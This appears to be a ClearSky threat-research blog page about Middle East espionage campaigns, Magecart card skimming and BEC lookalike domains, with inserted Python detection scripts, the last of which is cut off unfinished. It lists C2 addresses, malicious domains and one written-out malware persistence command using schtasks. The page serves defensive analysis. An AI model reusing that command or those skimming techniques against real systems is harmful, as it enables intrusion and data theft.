Channel: ClearSky Cyber Security

Gholee – a “protective edge” themed spear phishing campaign


Introduction

During the 2014 Israel–Gaza conflict, dubbed by Israel “Operation Protective Edge”, a rise in cyber-attacks against Israeli targets was reported. In this report we analyze one Operation Protective Edge themed spear phishing attack. The email carried a malicious Excel file which, once opened and its VBA code executed, infects the victim’s computer.

As of the publication of this report, the file is detected as malicious by only one antivirus engine.

Based on our analysis, we believe the threat actor behind this malware is a highly skilled professional.

Gholee

Our investigation of the Gholee malware started with the detection of a suspicious file sent by email to an undisclosed recipient. The file name was ‘Operation Protective Edge.xlsb’ (MD5: d0c3f4c9896d41a7c42737134ffb4c2e).

The file was first uploaded to VirusTotal on 10 August 2014, from Israel. At that time it was not detected as malicious by any of the 52 antivirus engines tested. Nine days later it was uploaded to VirusTotal again, also from Israel. This time it was detected as malicious only by Kaspersky, as Trojan-Dropper.MSExcel.Agent.ce.

Infection

Upon opening the file a message is displayed, saying:

“Due to security considerations I consciously hid the Informations. It will be visible for you by enabling content above.”


This is a social engineering tactic meant to lure the victim into enabling macro content. If macros are enabled, the message disappears and the following information is presented to the victim (the unreadable characters in the screenshot below may be the result of an encoding error in our lab environment; the victim would possibly see different, readable content).

Technical Analysis

Code

Analysis of the macro code reveals the following structure.

To avoid detection by protection measures such as antivirus and intrusion detection systems, ASCII character codes are used instead of the actual characters. Within each function, the codes are converted to characters and concatenated into a single string variable. Dozens of these functions are then concatenated, producing a single PE file.


Finally, the file is saved as NTUSER.DAT.{GUID}.dll (MD5: 48573a150562c57742230583456b4c02) and the function ShellExecute is used to run it via cmd.exe /C and Rundll32, in order to hide the process.
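The ASCII-code trick described above can be reversed mechanically, which also makes a useful triage check. The Python script below is an added example (not code from the report or from ClearSky): it pulls the Chr() arguments out of each function of a constructed VBA sample, reassembles the bytes in source order, and checks whether the result starts with an MZ header and contains a PE signature. The sample macro and the call-count threshold are assumptions.

```python
import re

# Constructed VBA sample in the style the report describes: each function builds a
# string from ASCII codes via Chr() concatenation. Illustrative only, not the Gholee macro.
SAMPLE_VBA = '''
Function p1()
    Dim s As String
    s = Chr(77) & Chr(90) & Chr(144) & Chr(0) & Chr(3) & Chr(0)
    s = s & Chr(0) & Chr(0) & Chr(4) & Chr(0) & Chr(0) & Chr(0)
    p1 = s
End Function

Function p2()
    p2 = Chr(80) & Chr(69) & Chr(0) & Chr(0)
End Function

Sub Auto_Open()
    MsgBox "Due to security considerations the content is hidden"
End Sub
'''

# Chr(n), Chr$(n), ChrB(n), ChrW(n): capture the numeric argument.
CHR_CALL = re.compile(r'\bChr[WB]?\$?\s*\(\s*(\d+)\s*\)', re.IGNORECASE)
# A "Function name ... End Function" block with its name and body.
FUNC_BLOCK = re.compile(r'Function\s+(\w+)\b(.*?)End\s+Function', re.IGNORECASE | re.DOTALL)


def chr_payload_per_function(vba):
    """Map each function name to the bytes its Chr() calls spell out, in source order."""
    payloads = {}
    for name, body in FUNC_BLOCK.findall(vba):
        codes = [int(c) for c in CHR_CALL.findall(body)]
        if codes:
            # ChrW codes above 255 cannot be single bytes; keep only the byte-range ones.
            payloads[name] = bytes(c for c in codes if 0 <= c <= 255)
    return payloads


def assemble(vba):
    """Concatenate the per-function pieces, mirroring how the macro glues them into one file."""
    return b''.join(chr_payload_per_function(vba).values())


def chr_density(vba):
    """Fraction of non-blank source lines that contain at least one Chr() call."""
    lines = [ln for ln in vba.splitlines() if ln.strip()]
    hits = sum(1 for ln in lines if CHR_CALL.search(ln))
    return hits / len(lines) if lines else 0.0


def assess(vba, min_calls=20):
    """Heuristic verdict: many Chr() calls, or a reassembled blob that starts with an MZ header."""
    blob = assemble(vba)
    calls = len(CHR_CALL.findall(vba))
    return {
        'chr_calls': calls,
        'chr_density': round(chr_density(vba), 2),
        'starts_with_mz': blob[:2] == b'MZ',
        'has_pe_signature': b'PE\x00\x00' in blob,
        # min_calls is an assumed threshold; tune it against benign macros in your environment.
        'suspicious': calls >= min_calls or blob[:2] == b'MZ',
    }


if __name__ == '__main__':
    print(assess(SAMPLE_VBA))
```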

The DLL is obfuscated and includes various mechanisms to evade debuggers such as OllyDbg and IDA and sandboxes such as Cuckoo and Anubis.

Analyzing the file, we have found an interesting entry point called gholee.


A quick Facebook search for that name together with “Iran” revealed that Gholee is a popular Iranian singer.

Communication

When run, the DLL communicates with a Kuwait-based IP address, 83.170.33.60, owned by the German company iABG Mbh, which provides satellite communication services.

The malware opens an SSL connection over port 443 using a digital certificate that expired in 2010. The certificate had been issued to the security company Core Security, creators of the offensive suite Core Impact, for the address *coreimpactagent.net.

It was issued by Thawte certificate authority.

Certificate fingerprint (MD5): 9C 80 C2 47 40 6D 6C ED FC E0 08 AE EF D9 98 90

Using a proxy and SSL stripping, the following communication pattern can be seen over HTTP:

GET  /index.php?c=Ud7atknq&r=17117d  HTTP/1.1
POST /index.php?c=Ud7atknq&r=1710b2  HTTP/1.1
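To act on this pattern in proxy logs, here is an added Python example (not code from the report): it scans constructed proxy log lines for the two C2 addresses named in this report, for other hosts in the /26 that contains them, and for the /index.php?c=...&r=... beacon shape. The log line layout and the sample lines are assumptions.

```python
import re
from ipaddress import ip_address, ip_network

# Indicators from the report: the two C2 addresses and the /26 netblock containing both.
C2_IPS = {'83.170.33.60', '83.170.33.37'}
C2_NET = ip_network('83.170.33.60/26', strict=False)   # resolves to 83.170.33.0/26

# Beacon shape seen after SSL interception: /index.php?c=<id>&r=<hex>
BEACON = re.compile(r'^/index\.php\?c=[A-Za-z0-9]+&r=[0-9a-f]{4,8}$')

# Constructed proxy log lines: "<timestamp> <client> <method> <url> <server>". Not real data.
SAMPLE_LOG = """
1407600001.123 10.0.0.15 GET https://83.170.33.60/index.php?c=Ud7atknq&r=17117d 83.170.33.60
1407600002.456 10.0.0.15 POST https://83.170.33.60/index.php?c=Ud7atknq&r=1710b2 83.170.33.60
1407600003.789 10.0.0.22 GET http://www.example.com/index.php?c=Ud7atknq&r=17117d 93.184.216.34
1407600004.000 10.0.0.31 GET https://83.170.33.40/ 83.170.33.40
1407600005.000 10.0.0.31 GET http://intranet.local/index.php 10.0.0.5
"""

LINE = re.compile(r'^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<url>\S+)\s+(?P<dst>\S+)$')


def url_path(url):
    """Return the path-and-query part of a URL ('/' if absent)."""
    rest = url.split('://', 1)[-1]
    idx = rest.find('/')
    return rest[idx:] if idx >= 0 else '/'


def in_c2_netblock(host):
    """True if host is an IP literal inside the C2 /26; hostnames are not resolved."""
    try:
        return ip_address(host) in C2_NET
    except ValueError:
        return False


def classify(line):
    """Return (client, server, reasons) for one log line, or None if it does not parse."""
    m = LINE.match(line.strip())
    if not m:
        return None
    reasons = []
    if m['dst'] in C2_IPS:
        reasons.append('known_c2_ip')
    elif in_c2_netblock(m['dst']):
        reasons.append('c2_netblock')
    if BEACON.match(url_path(m['url'])):
        reasons.append('beacon_pattern')
    return m['src'], m['dst'], reasons


def scan(log_text):
    """All lines that triggered at least one reason, in log order."""
    hits = []
    for line in log_text.splitlines():
        result = classify(line)
        if result and result[2]:
            hits.append(result)
    return hits


if __name__ == '__main__':
    for client, server, reasons in scan(SAMPLE_LOG):
        print(client, '->', server, ', '.join(reasons))
```

A beacon-pattern hit towards a host outside the netblock (third sample line) is the case worth triaging by hand: the URL shape alone is a weaker signal than the address.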

 

Related incidents

Searching for specific strings from the malicious file, we found another file that we believe is related to this campaign. The file name is “svchost 67.exe” (MD5: 916be1b609ed3dc80e5039a1d8102e82) and it was uploaded to VirusTotal[5] on 2 June 2014, more than two months before “Operation Protective Edge.xlsb”. It was uploaded twice from Latvia, potentially to test the malware’s detection rate.

“svchost 67.exe” communicated with 83.170.33.37, which is in the same /26 netblock as the address “Operation Protective Edge.xlsb” communicates with.

Detection and prevention

  • By using GPO to prevent macro code from running, infection by this malware can be avoided. Alternatively, files containing macro code should be blocked at the email gateway or by an anti-spam solution.
  • Logs and proxy servers should be checked for communication with the IP addresses the malware contacts: 83.170.33.60 and 83.170.33.37.
  • If you think you have been infected, check the system root folder for a file called NTUSER.DAT.{$GUID}.dll, for example NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0b**c}.dll.

  • The following Yara rule may be used to detect the Gholee malware:

rule gholee
{
    meta:
        author = "www.clearskysec.com"
        date = "2014/08"
        maltype = "Remote Access Trojan"
        filetype = "dll"
    strings:
        $a = "sandbox_avg10_vc9_SP1_2011"
        $b = "gholee"
    condition:
        all of them
}


Attacks against Israeli & Palestinian interests


Recently ClearSky’s researchers collaborated with PwC’s intelligence team while investigating attacks against Israeli and Palestinian interests.

The full post can be read on PwC’s Cyber security updates blog.

Here is the excerpt:

“This short report details the techniques being used in a series of attacks mostly against Israel-based organisations. The decoy documents and filenames used in the attacks suggest the intended targets include organisations with political interests or influence in Israel and Palestine. Although we are unable to link this campaign to any already documented in open source, it bears similarities to some described by others previously

The earliest samples in the campaign we have identified date back to the summer of 2014. The number of samples discovered and relatively small scale of infrastructure suggest the attackers have limited resources with which to conduct attacks.”

Thamar Reservoir – An Iranian cyber-attack campaign against targets in the Middle East


This report reviews an ongoing cyber-attack campaign dating back to mid-2014. Additional sources indicate it may date as far back as 2011. We call this campaign Thamar Reservoir, named after one of the targets, Thamar E. Gindin, who exposed new information about the attack and is currently assisting with the investigation.

The campaign includes several different attacks aimed at taking over the target’s computer or gaining access to their email account. We estimate that this access is used for espionage or other nation-state interests, not for monetary gain or hacktivism. In some cases the victim is not the final target; the attackers use the infected computer, email account, or stolen credentials as a platform to attack their intended target.

The attackers are extremely persistent in their attempts to breach their targets. These attempts include:

  • Breaching trusted websites to set up fake pages
  • Multi-stage malware
  • Multiple spear phishing emails based on reconnaissance and information gathering.
  • Phone calls to the target.
  • Messages on social networks.

While very successful in their attacks, the attackers are clearly not technically sophisticated. They are not new to hacking, but they make various mistakes, such as grammatical errors, exposure of attack infrastructure, easy-to-bypass anti-analysis techniques, lack of code obfuscation, and more.

These mistakes enabled us to learn about their infrastructure and methods. More importantly, we have learned of 550 targets, most of them in the Middle East, from various fields: research on diplomacy, the Middle East and Iran, international relations, and other topics; defense and security; journalism and human rights; and more.

Below is the target distribution by country:

Country distribution

Various characteristics of the attacks and their targets bring us to the conclusion that the threat actors are Iranian. In addition, we note that these attacks share characteristics with previously documented activities:

  • Attacks conducted using the Gholee malware, which we discovered.
  • Attacks reported by Trend Micro in Operation Woolen-Goldfish.
  • Attacks conducted by the Ajax Security Team as documented by FireEye.
  • Attacks seen during Newscaster as documented by iSight.

Read the full report: Thamar Reservoir – An Iranian cyber-attack campaign against targets in the Middle East

Rocket Kitten 2 – follow-up on Iran originated cyber-attacks


In the past few months ClearSky and Trend Micro have been monitoring and analyzing the Iranian cyber-attack group known as “Rocket Kitten”. The following report uncovers new attacks performed by the group, its methods and its operations.

Rocket Kitten has been operating since at least mid-2014. The group operates against numerous targets in the Middle East, including Israelis, Iranian exiles, and enemies of Iran. The targets are researchers and practitioners in the fields of policy, government and international relations, security, defense, journalism, human rights, and others.

The group relies heavily on social engineering, and it is persistent and targeted. Each target is repeatedly attacked using a variety of techniques, such as phone calls, SMS messages, Facebook messages, dedicated phishing websites, and spear phishing.

Our research suggests that the group’s intention is to obtain sensitive information and perform espionage, as it is ideologically motivated.

Previous reports about Rocket Kitten include ClearSky’s Gholee and “Thamar Reservoir” reports and Trend Micro’s Operation Woolen-Goldfish. Last week Citizen Lab published Two-Factor Authentication Phishing From Iran. The group was also analyzed in a presentation at the Chaos Communication Congress (CCC).

The new joint report, “Rocket Kitten 2”, includes incidents from the past few months, among them one in which the group tried to impersonate a ClearSky analyst and attempted to infect the target by usurping Trend Micro HouseCall.

The report includes the following sections:

  • Rocket Kitten attacker profile
  • The group’s targets and goals
  • Tactics and tools
  • Case studies
  • Safety measures and recommendations

Read the full report: The Kittens Strike Back: Rocket Kitten Continues Attacks on Middle East Targets

Report: The CopyKittens are targeting Israelis


CopyKittens is an espionage group that has been attacking Israeli targets since at least August 2014. Among the targets are high-ranking diplomats at Israel’s Ministry of Foreign Affairs and well-known Israeli academic researchers specializing in Middle East studies.

Matryoshka is the name we gave the malware built by CopyKittens. It is a multi-stage framework, with each part integrating into the subsequent one. CopyKittens assembled Matryoshka from code snippets picked from public repositories and online forums, hence their nickname.

Matryoshka is spread through spear phishing with a document attached to it. The document has either a malicious macro that the victim is asked to enable, or an embedded executable the victim is asked to open.

DNS requests and answers are used for command and control communication and for data exfiltration.

Based on the type of targets, delivery, and malware used – we estimate that CopyKittens are a state actor or are endorsed by one.

This report was produced by Minerva labs and ClearSky.

Read the full report: The CopyKittens attack group.

Operation DustySky


DustySky (called “NeD Worm” by its developer) is a multi-stage malware in use since May 2015. It is used by the Molerats (aka Gaza cybergang), a politically motivated group whose main objective, we believe, is intelligence gathering. Operating since 2012, the group’s activity has been reported by Norman [1], Kaspersky [2] [3], FireEye [4], and PwC [5].

This report revolves around a campaign that includes new malware developed by a member of the group or on its behalf. Based on dozens of known attacks and the vast infrastructure in use, we estimate that a wave of targeted malicious email messages has been sent on a weekly basis.

These attacks are targeted but not spear-phished: malicious email messages are sent to selected targets rather than mass-distributed at random, but they are not tailored to each and every target. Dozens of targets may receive the exact same message. The email message and the lure document are written in Hebrew, Arabic or English, depending on the target audience.

Targeted sectors include governmental and diplomatic institutions, including embassies; companies from the aerospace and defence industries; financial institutions; journalists; and software developers.

The attackers have been targeting software developers in general, using a fake website pretending to be a legitimate iOS management software, and linking to it in an online freelancing marketplace.

Most targets are from the Middle East: Israel, Egypt, Saudi Arabia, United Arab Emirates and Iraq. The United States and countries in Europe are targeted as well.

Read the full report: Operation DustySky
Indicators file: DusySky-indicators.xlsx  (DustySky indicators are tagged as such in PassiveTotal)

If you have been targeted with DustySky, or have questions about the report, please contact us at:
info[at]clearskysec.com

Also see “Operation DustySky Notes” by PassiveTotal for further discussion about the malicious infrastructure.

Acknowledgments

We would like to thank our colleagues for their ongoing information sharing and feedback, which have been crucial for this research: security researcher Infra; the PassiveTotal analyst team; Tom Lancaster of PwC; Team Cymru; security researcher Sebastián García; Menachem Perlman of LightCyber; and other security researchers who wish to remain anonymous.

[1] https://github.com/kbandla/APTnotes/blob/master/2012/Cyberattack_against_Israeli_and_Palestinian_targets.pdf

[2] http://www.seculert.com/blog/2014/01/xtreme-rat-strikes-israeli-organizations-again.html

[3] https://securelist.com/blog/research/72283/gaza-cybergang-wheres-your-ir-team

[4] https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html

[5] http://pwc.blogs.com/cyber_security_updates/2015/04/attacks-against-israeli-palestinian-interests.html

Operation DustySky – Part 2


Operation DustySky – Part 2 is a follow-up to our DustySky report from January 2016. It analyses new attacks by Molerats against targets in Israel, the United States, Egypt, Saudi Arabia, the United Arab Emirates and the Palestinian Authority.

We elaborate on the scope and targeting of the DustySky campaign and expose new infrastructure and incidents. In addition, we expose the identity of an individual who is behind the DustySky campaign. Following the previous report, this individual has contacted us trying to learn what we know about him.

Attacks against all targets in the Middle East stopped at once after we published the first report. However, the attacks against targets in the Middle East (except Israel) were renewed in less than 20 days. In the beginning of April 2016, we found evidence that the attacks against Israel have been renewed as well.

Based on the type of targets, on Gaza being the source of the attacks, and on the type of information the attackers are after – we estimate with medium-high certainty that the Hamas terrorist organization is behind these attacks.

Read the full report: Operation DustySky
Indicators file: DusySky2-indicators (also available on PassiveTotal)

If you have been targeted with DustySky, or have questions about the report, please contact us at:
info[at]clearskysec.com

Acknowledgments

This research was facilitated by PassiveTotal for threat infrastructure analysis.
We would like to thank the security researchers and organizations who shared information and provided feedback, which have been crucial for this research.

 

Magecart – a malicious infrastructure for stealing payment details from online shops


Since March 2016, numerous credit cards and other details have been stolen during payment from dozens of online shops worldwide. Malicious JavaScript code acting as a form grabber or a simple “cloud based” keylogger was injected into breached shops. As buyers filled in their payment details, the data was captured and sent in real time to the attacker.

This means that the information got stolen even if the seller worked according to PCI standards and did not keep credit card details in a database after purchase completion. This method is different than other ways of stealing payment details, such as infecting the buyer’s computer, implanting malware in Point of Sale terminals, or dumping entire databases from breached online shops.

In this post we analyze the malicious code and other parts of the campaign. RiskIQ, who we collaborated with on the investigation, dubbed this campaign Magecart. In parallel to this post, they are publishing a report reviewing other parts of the malicious infrastructure and compromised websites.

Security company Sucuri revealed parts of this campaign on July 30. Since then, the attackers have kept registering new domains and using them to host malicious JavaScript files, later injecting them into breached online shops.

Malicious JavaScript injection in breached shops

In order to implant the malicious JavaScript code, the attackers first had to gain access to change the source code of the website. They might have gained this access by exploiting a vulnerability in the web platform (such as Magento Commerce, Powerfront CMS, OpenCart, etc.) or by getting hold of admin credentials.

Then, the attacker would add a <script> tag, loading JavaScript from one of the dozens of domains they own.

Below are screenshots of the source code in three different breached websites, showing the injected malicious JavaScript:

In order to deceive security researchers, in some cases visiting the root domain or the IP to which it points would return an empty page redirecting to google.com.

Valid SSL certificates

The malicious JavaScript code is served over HTTPS with a valid SSL certificate. Using HTTPS is important for the attackers to keep their malicious activity undetected, because a script loaded over HTTP into an HTTPS page would trigger a “mixed content” warning to the user.

Below are some of the certificates used in the campaign:

js-abuse[.]su
Serial: 00 94 6e 7c aa 678e de 0c 33 c9 ee 01 d1 ff 36 fd
SHA1 thumbprint: 63 ff a2 6b b9 45 46 99 00 8f c2 ff 24 38 76 68 cf 3a 8e 93

cdn-js[.]link
Serial: 00 b5 ac fc 35 dc db 7b 3b 44 3e e2 61 ba 9d d7 a1
SHA1 thumbprint: 15 68 f9 67 5b c5 79 db 30 7f 52 01 dc 52 98 36 31 14 9e ef

statsdot[.]eu
Serial: 03 16 90 9f 7a d1 dd c5 2f c3 5c 7a 8c f2 c8 be 40 b0
SHA1 thumbprint: e6 28 c2 92 8c 4e 01 f5 a0 23 c0 12 52 71 45 b6 c7 25 f5 f7

stat-sj[.]link
Serial: 00 bd 60 18 62 e8 30 d6 17 f1 c9 b1 45 76 67 2d f8
SHA1 thumbprint: 6e 6e 30 78 26 ee 2e 46 56 ad e7 bd 9e c4 71 23 d1 03 61 ac

js-mod[.]su
Serial: 00 80 df 54 15 a6 96 99 06 20 86 4a 6b 42 e2 cf 74
SHA1 thumbprint: 18 e7 aa 7b 44 bc 12 16 c0 25 75 dd 52 25 1e 4c 33 44 ef c9

sj-mod[.]link
Serial: 73 07 83 4d 3b bf 49 4f 09 48 67 a8 b1 67 66 a2
SHA1 thumbprint: 46 b9 73 f6 ec dc 44 4c 26 78 51 bb 20 c9 23 a1 d2 42 ff fd

Credit card stealer functionality

The functionality of the credit card stealer is simple. Key parts are described below.

After the buyer fills in the form fields, the attributes of the fields are checked against a predefined array. The array is composed of attributes used in the targeted payment platform.

If any of the fields are present, the value of each and every input field in the page is collected into a variable, along with the host (i.e. the web address of the form).

The collected data is sent via an AJAX POST request to a URL in one of the malicious domains the attacker owns.

Different versions of this basic code are used over the campaign. In some cases, the code is served obfuscated.
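An added Python example (not code from ClearSky or RiskIQ) for the first check a shop owner can run against this kind of injection: it parses a constructed checkout page, lists every external script source, and flags those that are neither first-party nor allowlisted, matching them against the domains named in this post. The page, the shop host and the allowlist are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Domains named in this post as hosting the injected script. They are written defanged,
# as in the post, and refanged here for matching.
KNOWN_BAD = {d.replace('[.]', '.') for d in (
    'js-abuse[.]su', 'cdn-js[.]link', 'statsdot[.]eu',
    'stat-sj[.]link', 'js-mod[.]su', 'sj-mod[.]link')}

# Constructed checkout page with one injected tag; not a real site.
SAMPLE_HTML = """<html><head>
<script src="/js/app.js"></script>
<script src="https://js-abuse.su/js/checkout.js"></script>
<script src="//cdn.example-payments.com/lib.js"></script>
<script>var page = "checkout";</script>
</head><body><form id="checkout"><input name="cc_number"></form></body></html>"""


class ScriptCollector(HTMLParser):
    """Collect every <script src=...> and count inline <script> blocks."""

    def __init__(self):
        super().__init__()
        self.srcs = []
        self.inline = 0

    def handle_starttag(self, tag, attrs):
        if tag.lower() == 'script':
            src = dict(attrs).get('src')
            if src:
                self.srcs.append(src)
            else:
                self.inline += 1


def script_host(src, site_host):
    """Host a script is loaded from; relative URLs resolve to the shop itself."""
    if src.startswith('//'):                      # protocol-relative URL
        return urlparse('https:' + src).hostname
    parsed = urlparse(src)
    return parsed.hostname if parsed.scheme else site_host


def audit_scripts(html, site_host, allowlist=()):
    """Classify each external script against the shop's own host and an allowlist.

    Returns (findings, inline_count); findings are (src, host, verdict) tuples.
    """
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for src in collector.srcs:
        host = (script_host(src, site_host) or '').lower()
        if host == site_host:
            verdict = 'first_party'
        elif host in allowlist:
            verdict = 'allowed'
        elif host in KNOWN_BAD:
            verdict = 'known_magecart_host'
        else:
            verdict = 'unknown_third_party'
        findings.append((src, host, verdict))
    return findings, collector.inline


def suspicious(findings):
    """Only the findings that need a human look."""
    return [f for f in findings if f[2] in ('known_magecart_host', 'unknown_third_party')]


if __name__ == '__main__':
    found, inline = audit_scripts(SAMPLE_HTML, 'shop.example.com',
                                  allowlist={'cdn.example-payments.com'})
    for item in suspicious(found):
        print(item)
    print('inline scripts:', inline)
```

Inline script blocks are counted rather than judged, since an injected snippet can also be pasted directly into the page; diff those against a known-good copy of the template.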

Infrastructure

We used PassiveTotal to pivot off IPs (such as 80.87.205.145) and Whois details (such as the registrant email rudneva-y@mail.ua) to find further malicious domains.

This resulted in four clusters, sharing properties such as registrant email address and date of registration.

The full list of malicious domains, compromised eCommerce websites, and other Indicators of compromise can be found at RiskIQ’s post “Compromised eCommerce Sites Lead to Web-Based Keyloggers” (A Hebrew version is available).


Business Email Compromise fraud Against Global Shipping Companies


ClearSky Security regularly monitors and tracks phishing and fraud campaigns by looking for impersonating domain names. Recently we detected multiple domains being registered that impersonate shipping and logistics companies. We suspect that these companies have become the target of Business Email Compromise scams (aka BEC or “CEO fraud”).

Targeted organisations include Singaporean Executive Ship Management, VersaCold (Canada’s largest supply chain company), Tollgroup (the leading provider of express road freight within Australia) and more.

In the case of VersaCold, the malicious domain registered is versacoldl[.]com, impersonating versacold.com. In the case of Executive Ship Management, the malicious domain is executiveshlp[.]com which impersonates executiveship.com (l instead of i). And for Toll Group, tollgroup-as[.]com was registered instead of tollgroup.com.

This campaign targets companies in other industries as well, for example IKEA group, Amdocs, and Russian Standard (the biggest Russian Vodka brand).

The registrant name used in all of these domains is “Ian Stingly”, with the email address ian.gold@millindrinks.com. By conducting a reverse Whois search using domaintools.com, we can see other impersonating domains registered with these details, several of them also targeting shipping and logistics companies.

This kind of malicious activity serves to create infrastructure for Business Email Compromise scams. These scams usually start with an email from the “CEO” to employees from a domain name similar to the real one. Between October 2013 and February 2016, the FBI received reports from 17,642 companies that lost $2.3 billion in BEC fraud.

Companies can mitigate this threat by:

  1. Monitoring for new domains that may impersonate the organization and blocking them as soon as possible.
  2. Increasing employee awareness, in various ways, including periodical training sessions and publishing advisories about the threat.
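The monitoring in step 1 can be partly automated. The Python below is an added example (not ClearSky’s tooling): it compares a constructed feed of new registrations against the brand domains named in this post and reports why each one looks like an impersonation (a single-character edit, confusable characters such as l for i, a hyphenated affix, or a TLD swap). The feed and the rules are assumptions, and the registrable-label extraction assumes a single-label public suffix (.com, not .com.au).

```python
# Brand domains the post gives as impersonated.
BRANDS = ['versacold.com', 'executiveship.com', 'tollgroup.com']

# Constructed feed of "newly registered" domains: the three lookalikes from the post plus
# a TLD swap and a benign name. Not a real registration feed.
NEW_DOMAINS = ['versacoldl.com', 'executiveshlp.com', 'tollgroup-as.com',
               'versacold.net', 'unrelated-shipping.org']

# Character sequences that look alike in common fonts; both sides are folded before comparing.
FOLDS = (('rn', 'm'), ('vv', 'w'), ('1', 'l'), ('0', 'o'), ('l', 'i'))


def registrable_label(domain):
    """Second-level label, e.g. 'versacold' for versacold.com (assumes a one-label public suffix)."""
    return domain.lower().strip('.').split('.')[-2]


def fold(label):
    for a, b in FOLDS:
        label = label.replace(a, b)
    return label


def levenshtein(a, b):
    """Edit distance with the usual insert/delete/substitute costs of 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_reasons(candidate, brand):
    """List the impersonation rules a candidate domain triggers against one brand domain."""
    c, b = registrable_label(candidate), registrable_label(brand)
    if c == b:
        return ['tld_swap'] if candidate.lower() != brand.lower() else []
    reasons = []
    if c.startswith(b + '-') or c.endswith('-' + b):
        reasons.append('hyphen_affix')          # tollgroup-as.com
    if levenshtein(c, b) == 1:
        reasons.append('edit_distance_1')       # versacoldl.com
    if fold(c) == fold(b):
        reasons.append('homoglyph')             # executiveshlp.com (l for i)
    return reasons


def find_lookalikes(new_domains, brands):
    """Map each suspicious new domain to (brand it resembles, reasons)."""
    matches = {}
    for cand in new_domains:
        for brand in brands:
            reasons = lookalike_reasons(cand, brand)
            if reasons:
                matches[cand] = (brand, reasons)
                break
    return matches


if __name__ == '__main__':
    for domain, (brand, why) in find_lookalikes(NEW_DOMAINS, BRANDS).items():
        print(f'{domain} looks like {brand}: {", ".join(why)}')
```

Edit distance of 1 will also catch legitimate near-names, so pair the hits with registrant data (as the post does with the shared “Ian Stingly” registrant) before blocking.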

Attacks Against Customer Service Centers by Impersonation of Potential Clients


Hundreds of customer service centers have been targeted in a campaign going back at least to August 2016.

An email is sent to the “contact us” or “customer support” address of an online shop. The sender pretends to be a customer who has a problem with the online shopping cart or is just asking to make sure products are in stock.

The sender attaches a Word document to the email, and says that it lists the items he or she would like to purchase, or otherwise tries to entice the recipient to open the document.

For example:

Hello Customer Support,

I would like to place an order on <name of organisation>, however not certain if a couple items are in Stock. I have listed in the enclosed doc all I am interested in purchasing, can you review it and confirm if you have it in stock?

Thank you for your assistance.

Best Regards!

The Word document contains macro code that would infect the computer if enabled by the recipient.

In the samples we analysed, the malicious document communicated to the following address:

http://excelcenter[.]ro/port10/owalogon.asp

Samples

Below are 30 samples from the campaign, hundreds more exist. Note that the name of the malicious documents usually includes the domain name of the targeted company with a .doc suffix.


Acknowledgments

We would like to thank Matan Scharf of Cycuro for his assistance in the investigation.

Iranian Threat Agent OilRig Delivers Digitally Signed Malware, Impersonates University of Oxford


Iranian threat agent OilRig has been targeting multiple organisations in Israel and other countries in the Middle East since the end of 2015. In recent attacks they set up a fake VPN Web Portal and targeted at least five Israeli IT vendors, several financial institutes, and the Israeli Post Office.

Later, the attackers set up two fake websites pretending to be a University of Oxford conference sign-up page and a job application website. On these websites they hosted malware that was digitally signed with a valid, likely stolen, code signing certificate.

Based on VirusTotal uploads, malicious documents content, and known victims – other targeted organisations are located in Turkey, Qatar, Kuwait, United Arab Emirates, Saudi Arabia, and Lebanon.

Fake VPN Web Portal

In one of the recent cases, the attackers sent the following email to individuals in targeted organisations:

The email was sent from a compromised account of an IT vendor. Similar emails were sent from other IT vendors in the same time period, suggesting the attackers had a foothold within their networks, or at least could get access to specific computers or email accounts.

The link provided in the malicious email led to a fake VPN Web Portal:

Upon logging in with the credentials provided in the email, the victim is presented with the following page:

The victim is asked to install the “VPN Client” (an .exe file), or, if download fails, to download a password protected zip (with the same .exe file inside).

The “VPN Client” is legitimate Juniper VPN software bundled with Helminth, a malware in use by the OilRig threat agent:

JuniperSetupClientInstaller.exe
6a65d762fb548d2dc56cfde4842a4d3c (VirusTotal link)

If the victim downloads and installs the file, their computer is infected while the legitimate VPN software is installed. The legitimate and the malicious installations can be seen in the process tree when the file is run in a Cuckoo sandbox. Malicious processes are marked in red:

The following malicious files are dropped and run:

  • C:\ProgramData\{2ED05C38-D464-4188-BC7F-F6915DE8D764}\OFFLINE\9A189DFE\C7B7C186\main.vbs
    dcac79d7dc4365c6d742a49244e81fd0
  • C:\Users\Public\Libraries\RecordedTV\DnE.ps1
    7fe0cb5edc11861bc4313a6b04aeedb2
  • C:\Users\Public\Libraries\RecordedTV\DnS.ps1
    3920c11797ed7d489ca2a40201c66dd4
  • "C:\Windows\System32\schtasks.exe" /create /F /sc minute /mo 3 /tn "GoogleUpdateTasksMachineUI" /tr C:\Users\Public\Libraries\RecordedTV\backup.vbs
    7528c387f853d96420cf7e20f2ad1d32

Command and control server is located in the following domain:

tecsupport[.]in

A detailed analysis of the malware is provided in two posts by Palo Alto Networks and in a post by FireEye, which wrote about previous campaigns by this threat agent.

(Note that Juniper Networks was not compromised or otherwise involved in the attack, beyond the attackers using its name and publicly available software.)
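The schtasks command listed above has a recognisable shape that endpoint telemetry can catch. The Python below is an added example (not from the post, ClearSky or Palo Alto Networks): it parses constructed process-creation records, extracts each task’s schedule, name and action, and flags task creations that run a script from a user-writable path every few minutes. The event layout and the thresholds are assumptions.

```python
import shlex

# Constructed process-creation records (the kind Sysmon event ID 1 or an EDR would log).
# The first reproduces the command line listed in this post; the others are benign filler.
SAMPLE_EVENTS = [
    {'image': r'C:\Windows\System32\schtasks.exe',
     'cmdline': r'"C:\Windows\System32\schtasks.exe" /create /F /sc minute /mo 3 /tn "GoogleUpdateTasksMachineUI" /tr C:\Users\Public\Libraries\RecordedTV\backup.vbs'},
    {'image': r'C:\Windows\System32\schtasks.exe',
     'cmdline': r'schtasks.exe /create /sc daily /tn "NightlyBackup" /tr "C:\Program Files\Vendor\backup.exe"'},
    {'image': r'C:\Windows\System32\notepad.exe', 'cmdline': 'notepad.exe notes.txt'},
]

SCRIPT_EXT = ('.vbs', '.ps1', '.js', '.jse', '.bat', '.cmd', '.hta')
# Path fragments ordinary users can write to; persistence launched from here is rarely legitimate.
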